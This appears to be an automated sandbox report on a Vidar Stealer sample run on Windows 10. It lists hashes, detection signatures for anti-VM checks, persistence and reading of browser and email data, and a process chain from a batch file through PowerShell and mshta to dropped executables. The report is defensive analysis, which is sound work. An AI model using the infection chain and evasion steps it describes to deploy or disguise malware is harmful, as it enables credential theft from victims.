SHA1 99c99791c1b19472c503bb5350e6a051dc9defbe
SHA256 2194464755f14a6743e559420f58357a3c3a57ab7ccde134b0e6f6b66d486b36
SHA512 acdde94e7771e83f9a100738bf749aa9bd3f47a62e60cb6528b1ac6efd38c4959e224f7ebfd2113c0f9f2faa5e1470a16e42d2f7737c1d7ba3f3fb367799ca50

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8cd250bfe0106ed9f4378b50089abfb3
SHA1 de79dd61b8574fd20b77bdc4e6b76a04952f38f7
SHA256 09614cd049213f52962b8e40985cbdb81838c215abada5d8c354fd9a8500a5b5
SHA512 78b373f55545ecbebcb7cfceb0b70031337c4b504fae6947c151e0a9e7915b03fed48f57697136e2b13f0ed4b12b3f9db11c47e4a7bca0b3e1db02f003cd2002

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fc61746e7a7087da5dd7bddeb1348ed5
SHA1 86453e60aa43f660cc937df5d7ef498e266e2348
SHA256 114b740b760552124b76835fa4f0c62b1e25813bd1815778c014e45a9fac01a0
SHA512 79ecaf417796b3da8d5547b230b7f56dd11fac27a31579bf880a8f311ce2b85e53385985a659fa0141414403693d03c485065097242aa557f095042ddb5a021c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ec61140c17cce25c33c313f2ca9c7d64
SHA1 107683359b722dbd82fdf536508bc486ed7edc0d
SHA256 1039b3946a5a58116fdce551426899a12262091f56662a88707d20fdfd2d281a
SHA512 82625e73a1740e8020e5f5ee1356d32dd4fd87d867749c31129d24e0d690c88e9f0682f763edd5592e37e685ded937964b529e076c119aec4008e09a0055fd2f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9cb00248af7d986d59ff7564a0021c26
SHA1 05dd77e1ce0ec33a5f7ed18b77c618b6633a1907
SHA256 38d9ee9bcec098692d7aa941da023621a30356565922bb84b72229072c2215d9
SHA512 67183049a0c19c5b2691dd4510bbc8ee5f2696aa47b90d8a63e41c970c72584df161eab067000215545c4d9896979ca9094a080a5ed824d66a44e08875cd20fb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 475455bc0f01f431a5bd14213f14723e
SHA1 fcab0b863f4eff897090496cd1ef167024c3ed59
SHA256 1f897160b857b990e07b27b0d897f6d5491c7ae8922c5f6274fe5e0384c3b4a9
SHA512 5d874a1f1fb2a547de37975ea1f03387a44778111b9c38191a5570b129f9bcae9d2e777911e32c6dc0c6423a3e04b0ecfa1772f28a14dc3df158462a354685b1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 45c2188e0e14a49b3ca192fd8562c390
SHA1 9dd8e7d3fd894b71370cb9ed6b16c01dfb9199e6
SHA256 7a5983b136ba33052c3afbd2f28aae864c92c85e8825b6792023ca633c42ffea
SHA512 9b0d06cfd2c98f200909753691fe94400cf737350345ab14b875af9d7042304d51802bddf968c316e2cfb9723a0f717493c6e7af7a9b6d7d33407dc66cd48ec7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 79024d2857e36c69e9a7ff9af88685b3
SHA1 402bfa1fe9ad3f8a95950e73dc122d9f6e489b2f
SHA256 c1f3d68cbb6b16fcd4cdd058cfc552e1a9e53287943b526f7972fddaf66063c1
SHA512 1ec33ffb8162249e00b01cd3323fb1b109f1ca6685ff1b59042f481b178f1f1a91f2428c3fe7139b9a6b0d7bcaf00d77ad133267ccfa60224f948747a1858b58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8d0bf05b2d6fc4de2bf89527cc737251
SHA1 decf03ac94097bf1ffa1ca7a749762fb45bf3c87
SHA256 6c943789916ad49443d6c1a36db35c55109a1a2b1a22fb4cfbc05778a78634e9
SHA512 4face25a271a571de69a1302faa26540687385706134548a8b5c4e0dabe4795bc964a7c3c62b5dd48ec131e21feab3aa8efe4d760683c1790ae3feecf9eb863f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d4a4869e977a58178f48d651cbb2b1ce
SHA1 ead2b96cb04ff6177b916c01bbe47c719d5452c0
SHA256 ee19581396c94386bdace1cd7004681b4db47c4db35ac4ebede65f68e972808d
SHA512 aacd5a827a29c38c679711a21cdbdfeb53d1e545847688414136e53fadbcd7d30427c8334375e96f0a329794b07cdbdcd18a5b940f833eea41dc9a9b92d2109e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 26f580c63395311eece249695b3c7a46
SHA1 0df42b2f25ee63a344e7222291f684e06b3dd9c3
SHA256 02df7500c49b246b2821d12b698ff28fc73261d3fd68ee65b3f9a49eebd576f8
SHA512 681e63061343227100c8badacfd4a144ab870eed3b5d50c31b4f5a5ae9fed9834472497e83ecff33a6aadeec91880e6d65497b6c09220763f4a37bf0a8d1e09a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9d236e0516c4c00f026b5de80a7907af
SHA1 f972d3364de93a972e2bdea631ac2951f584fe3d
SHA256 0c8c8f674934dda01f9ba9d9bfd624979787d882b11d9eadd893fee2adf33e84
SHA512 b92e0a617ad7eff9ae2c773d686b8ae61e550ac98aab2886865484375dece3ed6a1a549f4cc466951911524eb7aa755d7bb21abbee147a552ce06148370ee5a5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e4012c4abd841ecef6c0ca7856c65ac4
SHA1 bd50d2ef78d4e2d22e1a436da8d172b2dc230380
SHA256 c4da21294c72ce9a15a61d5b6eea5056478b1935bc89ca4fcdf5d8e35ab640ae
SHA512 7f433ca0809554dc596e99055ff0880b3d703ce1b5bede7aea8ec72c5ff6564f24c5ecd0dae61f15d5f561563792bacb612270473aa26460c5f862b406191f15

Analysis: behavioral14

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:28

Platform

win10v2004-20250217-en

Max time kernel

34s

Max time network

36s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850860889933168" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3772 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3772 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3064 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3064 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2180 wrote to memory of 4508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 4508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2004 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2004 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 224 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 224 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 4944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3064 wrote to memory of 4944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3064 wrote to memory of 1232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3064 wrote to memory of 1232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1232 wrote to memory of 1084 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 1084 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1084 wrote to memory of 4292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 1084 wrote to memory of 4292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 1084 wrote to memory of 4292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 4292 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4292 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4292 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4504 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 4504 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 4504 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
